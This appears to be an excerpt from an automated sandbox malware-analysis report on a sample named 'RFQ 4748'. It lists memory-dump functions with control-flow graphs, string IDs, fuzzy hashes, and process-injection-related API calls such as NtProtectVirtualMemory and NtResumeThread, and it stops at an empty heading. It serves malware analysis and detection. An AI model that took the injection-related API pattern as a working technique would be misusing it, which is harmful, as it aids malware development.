                                                              control_flow_graph 2022 6c581a0-6c581cb 2023 6c581d2-6c5821f 2022->2023 2024 6c581cd 2022->2024 2027 6c58222-6c58228 2023->2027 2024->2023 2028 6c58231-6c58232 2027->2028 2029 6c5822a 2027->2029 2030 6c58234-6c58244 2028->2030 2031 6c58283-6c582c2 2028->2031 2029->2030 2029->2031 2034 6c58250-6c58279 2030->2034 2037 6c582c4-6c582ca 2031->2037 2038 6c582cc-6c582d2 2031->2038 2034->2027 2036 6c5827b-6c58281 2034->2036 2036->2027 2037->2038 2039 6c582d4 2038->2039 2040 6c582db-6c582dc 2038->2040 2041 6c58493-6c58540 call 6c57f10 2039->2041 2042 6c58553-6c58598 2039->2042 2043 6c583a2-6c5845a 2039->2043 2044 6c5845f-6c5848e 2039->2044 2045 6c582de-6c58391 call 6c57f10 2039->2045 2040->2045 2041->2038 2075 6c58546-6c5854e 2041->2075 2058 6c585a2-6c585a7 2042->2058 2059 6c5859a-6c585a0 2042->2059 2043->2038 2044->2038 2045->2038 2076 6c58397-6c5839d 2045->2076 2060 6c585ac-6c585fa 2058->2060 2061 6c585a9-6c585aa 2058->2061 2059->2058 2073 6c58604-6c58609 2060->2073 2074 6c585fc-6c58602 2060->2074 2061->2060 2078 6c5860e-6c58650 call 6c58f40 2073->2078 2079 6c5860b-6c5860c 2073->2079 2074->2073 2075->2038 2076->2038 2082 6c58652-6c58658 2078->2082 2083 6c5865a-6c58660 2078->2083 2079->2078 2082->2083 2084 6c58662 2083->2084 2085 6c58669-6c5866a 2083->2085 2086 6c586e5-6c58702 2084->2086 2087 6c587e7-6c58832 2084->2087 2088 6c588b1-6c588fd 2084->2088 2089 6c589d1-6c589d2 2084->2089 2090 6c586cc-6c586e0 2084->2090 2091 6c5866c-6c5868d 2084->2091 2092 6c5873c-6c5877e 2084->2092 2093 6c5883e-6c5883f 2084->2093 2094 6c58739-6c5873a 2084->2094 2095 6c58979-6c589c2 2084->2095 2096 6c5878a 2084->2096 2097 6c5890a-6c5890b 2084->2097 2085->2090 2085->2091 2086->2092 2108 6c58704-6c5871d 2086->2108 2106 6c587d5-6c587db 2087->2106 2128 6c58834-6c5883c 2087->2128 2111 6c5889c-6c588a5 2088->2111 2132 6c588ff-6c58908 2088->2132 2116 6c589d3 2089->2116 2090->2083 2121 6c58699-6c586c2 2091->2121 2114 6c58727-6c5872d 2092->2114 2129 6c58780-6c58788 2092->2129 2093->2111 2099 6c5878b 2094->2099 2110 6c58964-6c5896d 2095->2110 2131 6c589c4-6c589cf 2095->2131 2096->2099 2097->2110 2099->2106 2112 6c587e4-6c587e5 2106->2112 2113 6c587dd 2106->2113 2108->2114 2115 6c5871f-6c58725 2108->2115 2118 6c58976-6c58977 2110->2118 2119 6c5896f 2110->2119 2122 6c588a7 2111->2122 2123 6c588ae-6c588af 2111->2123 2112->2087 2113->2087 2113->2088 2113->2089 2113->2093 2113->2095 2113->2097 2126 6c58736-6c58737 2114->2126 2127 6c5872f 2114->2127 2115->2114 2116->2116 2118->2095 2119->2089 2119->2095 2121->2083 2130 6c586c4-6c586ca 2121->2130 2122->2088 2122->2089 2122->2095 2122->2097 2123->2088 2123->2097 2126->2092 2126->2094 2127->2087 2127->2088 2127->2089 2127->2092 2127->2093 2127->2094 2127->2095 2127->2096 2127->2097 2128->2106 2129->2114 2130->2083 2131->2110 2132->2111
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AQJ!$Te]q
                                                              • API String ID: 0-2361554527
                                                              • Opcode ID: 255c8cb141260b23f21fa8e1b6ef38e3871922c9ea90838489ee965b60071610
                                                              • Instruction ID: b7df14355f1d9283b1d4cd52f030b4c178c877e487851eacd6d6079ceb876200
                                                              • Opcode Fuzzy Hash: 255c8cb141260b23f21fa8e1b6ef38e3871922c9ea90838489ee965b60071610
                                                              • Instruction Fuzzy Hash: EB122874E06228CFEB94DF6AD884B99B7F2FB89300F1181A9D909A7344DB345D85CF45
                                                              Function 06C58190 Relevance: 2.9, Strings: 2, Instructions: 436COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2134 6c58190-6c581cb 2136 6c581d2-6c5821f 2134->2136 2137 6c581cd 2134->2137 2140 6c58222-6c58228 2136->2140 2137->2136 2141 6c58231-6c58232 2140->2141 2142 6c5822a 2140->2142 2143 6c58234-6c58244 2141->2143 2144 6c58283-6c582c2 2141->2144 2142->2143 2142->2144 2147 6c58250-6c58279 2143->2147 2150 6c582c4-6c582ca 2144->2150 2151 6c582cc-6c582d2 2144->2151 2147->2140 2149 6c5827b-6c58281 2147->2149 2149->2140 2150->2151 2152 6c582d4 2151->2152 2153 6c582db-6c582dc 2151->2153 2154 6c58493-6c58540 call 6c57f10 2152->2154 2155 6c58553-6c58598 2152->2155 2156 6c583a2-6c5845a 2152->2156 2157 6c5845f-6c5848e 2152->2157 2158 6c582de-6c58391 call 6c57f10 2152->2158 2153->2158 2154->2151 2188 6c58546-6c5854e 2154->2188 2171 6c585a2-6c585a7 2155->2171 2172 6c5859a-6c585a0 2155->2172 2156->2151 2157->2151 2158->2151 2189 6c58397-6c5839d 2158->2189 2173 6c585ac-6c585fa 2171->2173 2174 6c585a9-6c585aa 2171->2174 2172->2171 2186 6c58604-6c58609 2173->2186 2187 6c585fc-6c58602 2173->2187 2174->2173 2191 6c5860e-6c58650 call 6c58f40 2186->2191 2192 6c5860b-6c5860c 2186->2192 2187->2186 2188->2151 2189->2151 2195 6c58652-6c58658 2191->2195 2196 6c5865a-6c58660 2191->2196 2192->2191 2195->2196 2197 6c58662 2196->2197 2198 6c58669-6c5866a 2196->2198 2199 6c586e5-6c58702 2197->2199 2200 6c587e7-6c58832 2197->2200 2201 6c588b1-6c588fd 2197->2201 2202 6c589d1-6c589d2 2197->2202 2203 6c586cc-6c586e0 2197->2203 2204 6c5866c-6c5868d 2197->2204 2205 6c5873c-6c5877e 2197->2205 2206 6c5883e-6c5883f 2197->2206 2207 6c58739-6c5873a 2197->2207 2208 6c58979-6c589c2 2197->2208 2209 6c5878a 2197->2209 2210 6c5890a-6c5890b 2197->2210 2198->2203 2198->2204 2199->2205 2221 6c58704-6c5871d 2199->2221 2219 6c587d5-6c587db 2200->2219 2241 6c58834-6c5883c 2200->2241 2224 6c5889c-6c588a5 2201->2224 2245 6c588ff-6c58908 2201->2245 2229 6c589d3 2202->2229 2203->2196 2234 6c58699-6c586c2 2204->2234 2227 6c58727-6c5872d 2205->2227 2242 6c58780-6c58788 2205->2242 2206->2224 2212 6c5878b 2207->2212 2223 6c58964-6c5896d 2208->2223 2244 6c589c4-6c589cf 2208->2244 2209->2212 2210->2223 2212->2219 2225 6c587e4-6c587e5 2219->2225 2226 6c587dd 2219->2226 2221->2227 2228 6c5871f-6c58725 2221->2228 2231 6c58976-6c58977 2223->2231 2232 6c5896f 2223->2232 2235 6c588a7 2224->2235 2236 6c588ae-6c588af 2224->2236 2225->2200 2226->2200 2226->2201 2226->2202 2226->2206 2226->2208 2226->2210 2239 6c58736-6c58737 2227->2239 2240 6c5872f 2227->2240 2228->2227 2229->2229 2231->2208 2232->2202 2232->2208 2234->2196 2243 6c586c4-6c586ca 2234->2243 2235->2201 2235->2202 2235->2208 2235->2210 2236->2201 2236->2210 2239->2205 2239->2207 2240->2200 2240->2201 2240->2202 2240->2205 2240->2206 2240->2207 2240->2208 2240->2209 2240->2210 2241->2219 2242->2227 2243->2196 2244->2223 2245->2224
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AQJ!$Te]q
                                                              • API String ID: 0-2361554527
                                                              • Opcode ID: 1077b89c01dc931cda5caedbfe0e93b78717d8717bdd9469aae339085f642382
                                                              • Instruction ID: 53c96de138282c6790c5dfc16af65e7174b701e60f83938a84368bc1c5665c7f
                                                              • Opcode Fuzzy Hash: 1077b89c01dc931cda5caedbfe0e93b78717d8717bdd9469aae339085f642382
                                                              • Instruction Fuzzy Hash: 56123974E05228CFDBA4DF6AD884B99B7F2FB89300F1181A9D909A7344DB345D85CF45
                                                              Function 06AD9B2F Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06AD9C2E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: aabfd71ff3788f6cbfbb9477279e13297a0af48d423641bd4b403bb1c87fbf73
                                                              • Instruction ID: 8740aed09acf3a733b41f5825f99822bc58803a73b981252664c0ca3d527289d
                                                              • Opcode Fuzzy Hash: aabfd71ff3788f6cbfbb9477279e13297a0af48d423641bd4b403bb1c87fbf73
                                                              • Instruction Fuzzy Hash: 682171709053489FCB50EFAAD844AEFFBF9EF49314F518429D41967251CB39A844CFA1
                                                              Function 06AD8780 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06AD8809
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: 30f02295f54b180c87bdfc97fd7c790d55bb5c2d5f72efaae6a20e93cf35637c
                                                              • Instruction ID: 1dbdb9a02c2c93b3ad7ece7befdcbc4d9d69a1f963a4483e62e9f9701946d1a4
                                                              • Opcode Fuzzy Hash: 30f02295f54b180c87bdfc97fd7c790d55bb5c2d5f72efaae6a20e93cf35637c
                                                              • Instruction Fuzzy Hash: 0521E6B1D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7250C779A940CBA1
                                                              Function 06AD9BB8 Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06AD9C2E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 67b893b367243e2b27fa8ccce624ce79c1c84a5c1e2dd65ecb268c596d561dad
                                                              • Instruction ID: d0f5a9b07ae945a451329cf3d86dfa7ee53393a3734b4ccd168652d6ab9a3550
                                                              • Opcode Fuzzy Hash: 67b893b367243e2b27fa8ccce624ce79c1c84a5c1e2dd65ecb268c596d561dad
                                                              • Instruction Fuzzy Hash: 9921F7B1D006089EDB14DFAAC844AEFFBF9FF49324F508429D519A7250CB78A945CFA1
                                                              Function 06AD9BC0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06AD9C2E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: a0231a9ddf52b60bab84f1d27b41af1fff7f83a2db46a3b92198ecbbf29e7765
                                                              • Instruction ID: cfef3e6297d0bb06d9e4c565d2e1745880db46ec8f990a576eee9b866903f466
                                                              • Opcode Fuzzy Hash: a0231a9ddf52b60bab84f1d27b41af1fff7f83a2db46a3b92198ecbbf29e7765
                                                              • Instruction Fuzzy Hash: 9411E7B1D002498EDB14DFAAC4846AFFBF5FF49314F50842AD419A7250CB78A945CFA1
                                                              Function 06AAF4B0 Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PH]q
                                                              • API String ID: 0-3168235125
                                                              • Opcode ID: 3aafcbf6888822663b513da9c342e20097495a9abab3b291720795483cfbaab9
                                                              • Instruction ID: 4d94b5ac7260610240b0f1b42f8150e3e0b672994d4e1afb430f12aff804459c
                                                              • Opcode Fuzzy Hash: 3aafcbf6888822663b513da9c342e20097495a9abab3b291720795483cfbaab9
                                                              • Instruction Fuzzy Hash: 29D11874E04358CFEBA8EF69D48479DBBB2FB89304F2090AAC449AB354DB745985CF41
                                                              Function 06AEEED0 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: df42ee67012d49d57d533d1fa0d819b46475d5552adaa6fc6b2306624af62d82
                                                              • Instruction ID: a6be86c60cfdc511a145ce04333323f24ebda2fd83bffd278df45ed6e954a752
                                                              • Opcode Fuzzy Hash: df42ee67012d49d57d533d1fa0d819b46475d5552adaa6fc6b2306624af62d82
                                                              • Instruction Fuzzy Hash: 4FB1C8B4E06218CFEB94DFA9E98479DBBF2FF49300F1080A9D409AB255DB755985CF40
                                                              Function 06AEEEC0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: 61ba703eda319876fd9c859ac80fc7d8443580325c024527fe0e28c2e5fde370
                                                              • Instruction ID: ab17bcb88b5da9c546b51555dfd13a773591fab28b6ecdec3e76af9c311a7a71
                                                              • Opcode Fuzzy Hash: 61ba703eda319876fd9c859ac80fc7d8443580325c024527fe0e28c2e5fde370
                                                              • Instruction Fuzzy Hash: 1CB1C7B4E06218CFEB94DFA9E98479DBBF2FF49300F1080A9D409AB255DB755985CF40
                                                              Function 06AACA38 Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: e48e5782115c9773b3c44ef32a2b9d2bf7f29f975274813420d90842ba3aee49
                                                              • Instruction ID: dc0a6184aa21b403acb7a30d60b2d1f0580527d4a4dcc91d801e5d36f5e66ebf
                                                              • Opcode Fuzzy Hash: e48e5782115c9773b3c44ef32a2b9d2bf7f29f975274813420d90842ba3aee49
                                                              • Instruction Fuzzy Hash: 12915674E01218CFEB50EFA9D484BADBBB2FB8A300F10816AD40AA7355DB355D85CF41
                                                              Function 06AACA48 Relevance: 1.5, Strings: 1, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: dff442fa5825011c60e9cfbae50b245992d6d6697d7eb132fafc33e863b2a03c
                                                              • Instruction ID: 447e3970e805b01b9d38994152f6d7c438547a06007f8fd53b8a3eff421a68cd
                                                              • Opcode Fuzzy Hash: dff442fa5825011c60e9cfbae50b245992d6d6697d7eb132fafc33e863b2a03c
                                                              • Instruction Fuzzy Hash: 22914574E05218CFEB50EFA9D4887ADBBB2FB8A310F10816AD40AA7355DB345D85CF41
                                                              Function 012D2AB8 Relevance: 1.0, Instructions: 983COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d06a9153a783e54086bfb9271dcb5feb586aff77bea525e346d247b4d349bcf
                                                              • Instruction ID: 1f1b3c0f211ae50e66b3c07d0513dfbc2ad4317fb71e52c258a4d03b4aee9ba1
                                                              • Opcode Fuzzy Hash: 1d06a9153a783e54086bfb9271dcb5feb586aff77bea525e346d247b4d349bcf
                                                              • Instruction Fuzzy Hash: AD92ABB4A24209CFD711DF19D688AA9BBF1FB04324F55C1A9D1059F266D3BAEC84CF42
                                                              Function 06AE19A3 Relevance: .5, Instructions: 539COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8ca2de87be9e242f29e27003bdd8db16ea24fef8a1ac14b8f222599c49ccfd2
                                                              • Instruction ID: bace70bfe13191be02700354bffad74b1871c1763b79c141103fdf1ff9c5ab8b
                                                              • Opcode Fuzzy Hash: a8ca2de87be9e242f29e27003bdd8db16ea24fef8a1ac14b8f222599c49ccfd2
                                                              • Instruction Fuzzy Hash: 745282B4A046298FCB64EF28C984B9AB7B6FF89301F1081D9D54DA7355DB30AE81CF51
                                                              Function 06AAE645 Relevance: .4, Instructions: 390COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: edd829f8726c23d460c303ac443cd5a39b60af5eeb8ff6c0edf796d8a193c404
                                                              • Instruction ID: 09268b2d03d8a043f562d0f02fe4282580e53e6fec9d8cb8f4019e2288a611af
                                                              • Opcode Fuzzy Hash: edd829f8726c23d460c303ac443cd5a39b60af5eeb8ff6c0edf796d8a193c404
                                                              • Instruction Fuzzy Hash: 39F15974E00258DFDB94EFA9D884BADBBF1FF89304F1081AAD049AB295CB345985CF51
                                                              Function 06AAE6E5 Relevance: .4, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25560d280b5446ff06c41b79c1c7a2cfc58435c6a8c53e0789a21f8019295a3a
                                                              • Instruction ID: 40aee85eee5d38cfd81b00ffe993a7d883760343a2e84495b15b27dd8055de6e
                                                              • Opcode Fuzzy Hash: 25560d280b5446ff06c41b79c1c7a2cfc58435c6a8c53e0789a21f8019295a3a
                                                              • Instruction Fuzzy Hash: D5E13B74E00358DFDB94EFA9D884BADBBF1FB89304F1081AAD049AB295CB345985CF51
                                                              Function 06AAE6F5 Relevance: .3, Instructions: 343COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b301203c0fe3576734d2170fb23b0556b487884209077c603d91296caa60e1f
                                                              • Instruction ID: e51a7233b7c6bbf536b21ce360ba60f6b50109dfbbfa928038045c9c4f20d692
                                                              • Opcode Fuzzy Hash: 6b301203c0fe3576734d2170fb23b0556b487884209077c603d91296caa60e1f
                                                              • Instruction Fuzzy Hash: EAE12B74E00358DFDB94EFA9D884BADBBF1FB89304F1081AAD049AB255CB345985CF51
                                                              Function 06AAE718 Relevance: .3, Instructions: 330COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 712ddd9021329d39630b1b5be6ff0ff0198ec6002bf95049f050cb3fd4d744e4
                                                              • Instruction ID: e7952198349ae2ada12b44d1eef032aab85641fe4bd63b346be32329e7594742
                                                              • Opcode Fuzzy Hash: 712ddd9021329d39630b1b5be6ff0ff0198ec6002bf95049f050cb3fd4d744e4
                                                              • Instruction Fuzzy Hash: 9FE12B74E04358CFDB94EFA9D884BADBBF2FB89304F1081AAD049AB255CB345985CF51
                                                              Function 06AAE130 Relevance: .3, Instructions: 295COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105199393.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6aa0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7269ea9137c4b72ced5d405bfc625dac22e47219959e0224b441822dc95e4719
                                                              • Instruction ID: b0cc26cdaf58012925c5835554dde33cd3258ed6b3e415b2a6e7fe3d5fbbd937
                                                              • Opcode Fuzzy Hash: 7269ea9137c4b72ced5d405bfc625dac22e47219959e0224b441822dc95e4719
                                                              • Instruction Fuzzy Hash: 3AD11974A04258CFDB94EFA8D884BADBBF2FB89304F1091AAD049AB255CB345D85CF01
                                                              Function 06AE001E Relevance: .1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2e29efb23b1e48f475cdbb38c212a936a934b9ace841a9355dd3e2eb78d6542
                                                              • Instruction ID: afde167fa9789df46b7948cedf35d292d3eabe0fb754475acbbda1d21296c772
                                                              • Opcode Fuzzy Hash: d2e29efb23b1e48f475cdbb38c212a936a934b9ace841a9355dd3e2eb78d6542
                                                              • Instruction Fuzzy Hash: 51510B71E01A188BD718DF6BCC8468ABBF3BFC9301F04C1AAD448AB255DB745A85CF50
                                                              Function 012D19B7 Relevance: 5.4, Strings: 4, Instructions: 357COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 794 12d19b7-12d19c5 795 12d19cb-12d1a19 794->795 796 12d19c7-12d19ca 794->796 800 12d1a1b-12d1a1f 795->800 801 12d1a25-12d1a39 795->801 796->795 800->801 803 12d1a47-12d1a52 801->803 805 12d1a3b-12d1a3e 803->805 805->803 806 12d1a40 805->806 806->803 807 12d1ac8-12d1acb 806->807 808 12d1a6b-12d1a7b 806->808 809 12d1b0a-12d1b1e 806->809 810 12d1caa-12d1cba 806->810 811 12d1a84-12d1a97 806->811 812 12d1de6-12d1e01 call 12d029c 806->812 813 12d1b23-12d1b3a 806->813 814 12d1e03-12d1e0e 806->814 815 12d1a7d-12d1a82 806->815 816 12d1cbc-12d1cd5 806->816 817 12d1b3f 806->817 818 12d1a99-12d1ab4 806->818 819 12d1a54-12d1a69 806->819 820 12d1ab6-12d1ab8 806->820 821 12d1c96-12d1c9d 806->821 822 12d1e10-12d1e13 806->822 827 12d1e75-12d1ed5 807->827 828 12d1ad1-12d1ae4 807->828 808->805 809->805 845 12d1c6f-12d1c72 810->845 811->805 825 12d1dcd-12d1dd0 812->825 813->805 814->825 815->805 830 12d1cdb 816->830 831 12d1cd7-12d1cd9 816->831 823 12d1b40-12d1b43 817->823 818->805 819->805 820->823 826 12d1abe-12d1ac3 820->826 842 12d1ca3-12d1ca8 821->842 904 12d1e16 call 12d2170 822->904 905 12d1e16 call 12d2180 822->905 823->807 829 12d1b45-12d1b94 call 12d114c 823->829 833 12d1dd9-12d1de4 825->833 834 12d1dd2 825->834 826->805 859 12d1edb-12d1ee1 827->859 860 12d1ed7-12d1eda 827->860 828->827 840 12d1aea-12d1af6 828->840 882 12d1b96-12d1b9a 829->882 883 12d1ba0-12d1c0f 829->883 846 12d1ce0-12d1ce2 830->846 831->846 833->825 834->812 834->814 834->822 834->833 847 12d1e5b-12d1e74 834->847 839 12d1e1c-12d1e27 839->825 840->827 849 12d1afc-12d1b05 840->849 842->845 856 12d1c64 845->856 857 12d1c74 845->857 852 12d1ced 846->852 853 12d1ce4 846->853 849->805 852->825 853->852 856->845 857->810 857->812 857->814 857->816 857->821 857->822 857->847 864 12d1c7b-12d1c8f 857->864 861 12d1f26 859->861 862 12d1ee3 859->862 860->859 876 12d1f29-12d1f2a 861->876 862->861 866 12d1efc-12d1f01 862->866 867 12d1f1f-12d1f24 862->867 868 12d1eee-12d1ef3 862->868 869 12d1f18-12d1f1d 862->869 870 12d1f0a-12d1f0f 862->870 871 12d1eea-12d1eec 862->871 872 12d1ef5-12d1efa 862->872 873 12d1f11-12d1f16 862->873 874 12d1f03-12d1f08 862->874 864->821 866->876 867->876 868->876 869->876 870->876 871->876 872->876 873->876 874->876 882->883 892 12d1c26-12d1c39 883->892 893 12d1c11-12d1c24 883->893 898 12d1c3b-12d1c40 892->898 899 12d1c42 892->899 896 12d1c5b 893->896 906 12d1c5b call 12d1f69 896->906 907 12d1c5b call 12d1f78 896->907 901 12d1c44-12d1c46 898->901 899->901 900 12d1c61 900->856 901->864 902 12d1c48-12d1c59 901->902 902->896 904->839 905->839 906->900 907->900
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$TJbq$TJbq$Te]q
                                                              • API String ID: 0-2582363881
                                                              • Opcode ID: 3217f9b6b04d0c9eab04ddd3a3178c9407901803c7643a79c4395dbfe018e1e5
                                                              • Instruction ID: b6f021e41beb8688d0b5d332c480867cb29df72e4a3036acb1f3036e1e618569
                                                              • Opcode Fuzzy Hash: 3217f9b6b04d0c9eab04ddd3a3178c9407901803c7643a79c4395dbfe018e1e5
                                                              • Instruction Fuzzy Hash: 45E17B74A242058FD708DFA8D494BA9BBF2FF88310F1581AAE546DB7A5CB70DC51CB42
                                                              Function 012D4161 Relevance: 5.2, Strings: 4, Instructions: 203COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
